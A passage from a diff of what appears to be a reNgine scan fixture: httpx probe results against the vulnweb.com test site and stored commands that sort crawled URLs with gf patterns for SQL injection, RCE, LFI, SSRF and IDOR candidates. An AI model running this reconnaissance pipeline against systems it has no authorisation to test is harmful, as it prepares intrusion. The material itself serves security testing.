Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/home\",\"time\":\"348.554518ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:42.386941136Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com:80/premier-edition-bundle\",\"input\":\"http://www.vulnweb.com:80/premier-edition-bundle\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/premier-edition-bundle\",\"time\":\"342.836127ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:42.390547947Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com:80/admin\",\"input\":\"http://www.vulnweb.com:80/admin\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin\",\"time\":\"356.829367ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:42.395397503Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com:80/plugins/seo\",\"input\":\"http://www.vulnweb.com:80/plugins/seo\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/plugins/seo\",\"time\":\"342.798093ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:42.40447128Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com:80/myimages.php\",\"input\":\"http://www.vulnweb.com:80/myimages.php\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/myimages.php\",\"time\":\"347.489552ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:42.413603453Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com:80/updateif.php”\\u0026\",\"input\":\"http://www.vulnweb.com:80/updateif.php%E2%80%9D\\u0026\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/updateif.php%E2%80%9D\\u0026\",\"time\":\"352.048363ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:42.42765771Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com:80/updateif.php\",\"input\":\"http://www.vulnweb.com:80/updateif.php\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/updateif.php\",\"time\":\"357.073892ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:43.518785608Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-includes/js/thickbox/macFFBgHack.png\",\"input\":\"http://vulnweb.com/wp-includes/js/thickbox/macFFBgHack.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-includes/js/thickbox/macFFBgHack.png\",\"time\":\"338.39285ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:43.53511909Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-includes/js/thickbox/tb-close.png\",\"input\":\"http://vulnweb.com/wp-includes/js/thickbox/tb-close.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-includes/js/thickbox/tb-close.png\",\"time\":\"348.513656ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:43.535912673Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-includes/js/thickbox/thickbox.css?ver=20121105\",\"input\":\"http://vulnweb.com/wp-includes/js/thickbox/thickbox.css?ver=20121105\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-includes/js/thickbox/thickbox.css?ver=20121105\",\"time\":\"347.767592ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:43.542724413Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-includes/wlwmanifest.xml\",\"input\":\"http://vulnweb.com/wp-includes/wlwmanifest.xml\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-includes/wlwmanifest.xml\",\"time\":\"347.676701ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:43.546811187Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105\",\"input\":\"http://vulnweb.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105\",\"time\":\"351.822004ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:45.640891429Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com/2014/04/get-freedownloadidm517patchkeygen-program.html\",\"input\":\"http://www.vulnweb.com/2014/04/get-freedownloadidm517patchkeygen-program.html\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/2014/04/get-freedownloadidm517patchkeygen-program.html\",\"time\":\"338.731526ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:45.64857861Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com\",\"input\":\"http://www.vulnweb.com\",\"title\":\"Acunetix Web Vulnerability Scanner - Test websites\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"343.707016ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":482,\"lines\":74,\"status_code\":200,\"content_length\":4018,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:45.658999124Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com/https://torproject.org/https://en.wikipedia.org/wiki/.onionhttps://security.stackexchange.com/questions/78682/https://www.torproject.org/projects/torbrowser.html.enhttps://tails.boum.org/https://www.whonix.org/https://www.whonix.org/wiki/VirtualBoxhttps://www.virtualbox.org/https://www.whonix.org/wiki/Downloadhttps://panopticlick.eff.org/http://maill4dnx45yrtsy.onion/https://www.torproject.org/docs/hidden-services.html.enhttps://security.stackexchange.com/questions/79438/https://en.wikipedia.org/wiki/Forward_secrecyhttps://en.wikipedia.org/wiki/Off-the-Record_Messaginghttps://whispersystems.org/blog/asynchronous-security/https://f5.com/glossary/ssl-offloadinghttp://en.wikipedia.org/wiki/SSL_accelerationhttp://nginx.com/blog/nginx-ssl/http://www.pcgamer.com/dota-2-esports-league-suspended-after-players-hit-by-ddos-attacks/https://security.stackexchange.com/a/79363/12https://security.stackexchange.com/a/31846/39623https://hashcat.net/oclhashcat/https://security.stackexchange.com/a/51080/39623https://www.ietf.org/rfc/rfc2898.txthttps://www.ietf.org/rfc/rfc2104.txthttps://hashcat.net/oclhashcat/https://hashcat.net/wiki/doku.php?id=rule_based_attackhttps://hashcat.net/wiki/doku.php?id=dictionary_attackhttps://security.stackexchange.com/a/7701/39623https://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/http://hynek.mehttp://wiki.apache.org/tomcat/HowTo/SSLCiphershttp://markmail.org/message/zn4namfhypyxum23https://security.stackexchange.com/a/77018/39623http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-52r1.pdfhttps://ssllabs.comhttp://webstersprodigy.net/2012/02/04/serving-back-xml-for-xss/http://azure.microsoft.com/en-us/documentation/articles/cache-dotnet-how-to-use-azure-redis-cache/\",\"input\":\"http://www.vulnweb.com/https://torproject.org/https://en.wikipedia.org/wiki/.onionhttps://security.stackexchange.com/questions/78682/https://www.torproject.org/projects/torbrowser.html.enhttps://tails.boum.org/https://www.whonix.org/https://www.whonix.org/wiki/VirtualBoxhttps://www.virtualbox.org/https://www.whonix.org/wiki/Downloadhttps://panopticlick.eff.org/http://maill4dnx45yrtsy.onion/https://www.torproject.org/docs/hidden-services.html.enhttps://security.stackexchange.com/questions/79438/https://en.wikipedia.org/wiki/Forward_secrecyhttps://en.wikipedia.org/wiki/Off-the-Record_Messaginghttps://whispersystems.org/blog/asynchronous-security/https://f5.com/glossary/ssl-offloadinghttp://en.wikipedia.org/wiki/SSL_accelerationhttp://nginx.com/blog/nginx-ssl/http://www.pcgamer.com/dota-2-esports-league-suspended-after-players-hit-by-ddos-attacks/https://security.stackexchange.com/a/79363/12https://security.stackexchange.com/a/31846/39623https://hashcat.net/oclhashcat/https://security.stackexchange.com/a/51080/39623https://www.ietf.org/rfc/rfc2898.txthttps://www.ietf.org/rfc/rfc2104.txthttps://hashcat.net/oclhashcat/https://hashcat.net/wiki/doku.php?id=rule_based_attackhttps://hashcat.net/wiki/doku.php?id=dictionary_attackhttps://security.stackexchange.com/a/7701/39623https://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/http://hynek.mehttp://wiki.apache.org/tomcat/HowTo/SSLCiphershttp://markmail.org/message/zn4namfhypyxum23https://security.stackexchange.com/a/77018/39623http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-52r1.pdfhttps://ssllabs.comhttp://webstersprodigy.net/2012/02/04/serving-back-xml-for-xss/http://azure.microsoft.com/en-us/documentation/articles/cache-dotnet-how-to-use-azure-redis-cache/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/https://torproject.org/https://en.wikipedia.org/wiki/.onionhttps://security.stackexchange.com/questions/78682/https://www.torproject.org/projects/torbrowser.html.enhttps://tails.boum.org/https://www.whonix.org/https://www.whonix.org/wiki/VirtualBoxhttps://www.virtualbox.org/https://www.whonix.org/wiki/Downloadhttps://panopticlick.eff.org/http://maill4dnx45yrtsy.onion/https://www.torproject.org/docs/hidden-services.html.enhttps://security.stackexchange.com/questions/79438/https://en.wikipedia.org/wiki/Forward_secrecyhttps://en.wikipedia.org/wiki/Off-the-Record_Messaginghttps://whispersystems.org/blog/asynchronous-security/https://f5.com/glossary/ssl-offloadinghttp://en.wikipedia.org/wiki/SSL_accelerationhttp://nginx.com/blog/nginx-ssl/http://www.pcgamer.com/dota-2-esports-league-suspended-after-players-hit-by-ddos-attacks/https://security.stackexchange.com/a/79363/12https://security.stackexchange.com/a/31846/39623https://hashcat.net/oclhashcat/https://security.stackexchange.com/a/51080/39623https://www.ietf.org/rfc/rfc2898.txthttps://www.ietf.org/rfc/rfc2104.txthttps://hashcat.net/oclhashcat/https://hashcat.net/wiki/doku.php?id=rule_based_attackhttps://hashcat.net/wiki/doku.php?id=dictionary_attackhttps://security.stackexchange.com/a/7701/39623https://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/http://hynek.mehttp://wiki.apache.org/tomcat/HowTo/SSLCiphershttp://markmail.org/message/zn4namfhypyxum23https://security.stackexchange.com/a/77018/39623http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-52r1.pdfhttps://ssllabs.comhttp://webstersprodigy.net/2012/02/04/serving-back-xml-for-xss/http://azure.microsoft.com/en-us/documentation/articles/cache-dotnet-how-to-use-azure-redis-cache/\",\"time\":\"346.842927ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:45.660577218Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com/?ref=hackernoon.com\",\"input\":\"http://www.vulnweb.com/?ref=hackernoon.com\",\"title\":\"Acunetix Web Vulnerability Scanner - Test websites\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?ref=hackernoon.com\",\"time\":\"351.202765ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":482,\"lines\":74,\"status_code\":200,\"content_length\":4018,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:45.663049698Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com/?rev=23\",\"input\":\"http://www.vulnweb.com/?rev=23\",\"title\":\"Acunetix Web Vulnerability Scanner - Test websites\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?rev=23\",\"time\":\"347.331792ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":482,\"lines\":74,\"status_code\":200,\"content_length\":4018,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:45.686740403Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com/mobile/\",\"input\":\"http://www.vulnweb.com/mobile/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/mobile/\",\"time\":\"352.099183ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:45.708151668Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com/news/story/0ap2000000266504/article/bill-belichick-disagrees-with-penalty-call-in-pats-loss\",\"input\":\"http://www.vulnweb.com/news/story/0ap2000000266504/article/bill-belichick-disagrees-with-penalty-call-in-pats-loss\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/news/story/0ap2000000266504/article/bill-belichick-disagrees-with-penalty-call-in-pats-loss\",\"time\":\"360.246186ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:46.672810896Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com/news/story/0ap3000000944680/article/ravens-activate-guard-marshal-yanda-from-pup-list\",\"input\":\"http://www.vulnweb.com/news/story/0ap3000000944680/article/ravens-activate-guard-marshal-yanda-from-pup-list\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/news/story/0ap3000000944680/article/ravens-activate-guard-marshal-yanda-from-pup-list\",\"time\":\"339.235915ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:46.687736298Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com/news/story/0ap3000000944702/article/irsay-colts-wouldnt-trade-brissett-for-firstround-pick\",\"input\":\"http://www.vulnweb.com/news/story/0ap3000000944702/article/irsay-colts-wouldnt-trade-brissett-for-firstround-pick\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/news/story/0ap3000000944702/article/irsay-colts-wouldnt-trade-brissett-for-firstround-pick\",\"time\":\"352.284566ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:51.365395614Z\",\"url\":\"https://testaspnet.vulnweb.com\",\"input\":\"https://testaspnet.vulnweb.com\",\"error\":\"i/o timeout (Client.Timeout exceeded while awaiting headers)\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:33:51.666958611Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com/updateif.php””\",\"input\":\"http://www.vulnweb.com/updateif.php%E2%80%9D%E2%80%9D\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/updateif.php%E2%80%9D%E2%80%9D\",\"time\":\"342.780261ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:51.670980483Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com/usr/themes/lanstar-master/assets/js/gazeimg.js\",\"input\":\"http://www.vulnweb.com/usr/themes/lanstar-master/assets/js/gazeimg.js\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/usr/themes/lanstar-master/assets/js/gazeimg.js\",\"time\":\"342.092654ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:51.674663831Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com/usr/themes/lanstar-master/assets/js/lanstarApp.js\",\"input\":\"http://www.vulnweb.com/usr/themes/lanstar-master/assets/js/lanstarApp.js\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/usr/themes/lanstar-master/assets/js/lanstarApp.js\",\"time\":\"342.460841ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:51.679053004Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com/usr/themes/lanstar-master/assets/css/gazeimg.css\",\"input\":\"http://www.vulnweb.com/usr/themes/lanstar-master/assets/css/gazeimg.css\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/usr/themes/lanstar-master/assets/css/gazeimg.css\",\"time\":\"350.616014ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:51.68011346Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com/usr/themes/lanstar-master/assets/js/page.js\",\"input\":\"http://www.vulnweb.com/usr/themes/lanstar-master/assets/js/page.js\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/usr/themes/lanstar-master/assets/js/page.js\",\"time\":\"343.177399ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n", + "time": "2024-11-13T02:14:50.745Z" + } +}, +{ + "model": "startScan.command", + "pk": 81, + "fields": { + "scan_history": 1, + "activity": null, + "command": "rm /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/httpx_input.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:34:16.370Z" + } +}, +{ + "model": "startScan.command", + "pk": 82, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt | gf debug_logic | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' >> /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gf_patterns_debug_logic.txt", + "return_code": 1, + "output": "", + "time": "2024-11-13T02:34:16.398Z" + } +}, +{ + "model": "startScan.command", + "pk": 83, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt | gf idor | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' >> /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gf_patterns_idor.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:34:16.426Z" + } +}, +{ + "model": "startScan.command", + "pk": 84, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt | gf interestingEXT | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' >> /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gf_patterns_interestingEXT.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:34:16.489Z" + } +}, +{ + "model": "startScan.command", + "pk": 85, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt | gf interestingparams | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' >> /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gf_patterns_interestingparams.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:34:16.531Z" + } +}, +{ + "model": "startScan.command", + "pk": 86, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt | gf interestingsubs | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' >> /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gf_patterns_interestingsubs.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:34:16.581Z" + } +}, +{ + "model": "startScan.command", + "pk": 87, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt | gf lfi | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' >> /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gf_patterns_lfi.txt", + "return_code": 1, + "output": "", + "time": "2024-11-13T02:34:16.632Z" + } +}, +{ + "model": "startScan.command", + "pk": 88, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt | gf rce | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' >> /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gf_patterns_rce.txt", + "return_code": 1, + "output": "", + "time": "2024-11-13T02:34:16.655Z" + } +}, +{ + "model": "startScan.command", + "pk": 89, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt | gf redirect | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' >> /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gf_patterns_redirect.txt", + "return_code": 1, + "output": "", + "time": "2024-11-13T02:34:16.679Z" + } +}, +{ + "model": "startScan.command", + "pk": 90, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt | gf sqli | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' >> /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gf_patterns_sqli.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:34:16.708Z" } }, { - "model": "startScan.directoryfile", - "pk": 38, + "model": "startScan.command", + "pk": 91, "fields": { - "length": 4018, - "lines": 74, - "http_status": 200, - "words": 482, - "name": "aW5kZXguaHRtbA==", - "url": "http://vulnweb.com/index.html", - "content_type": "text/html" + "scan_history": 1, + "activity": 5, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt | gf ssrf | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' >> 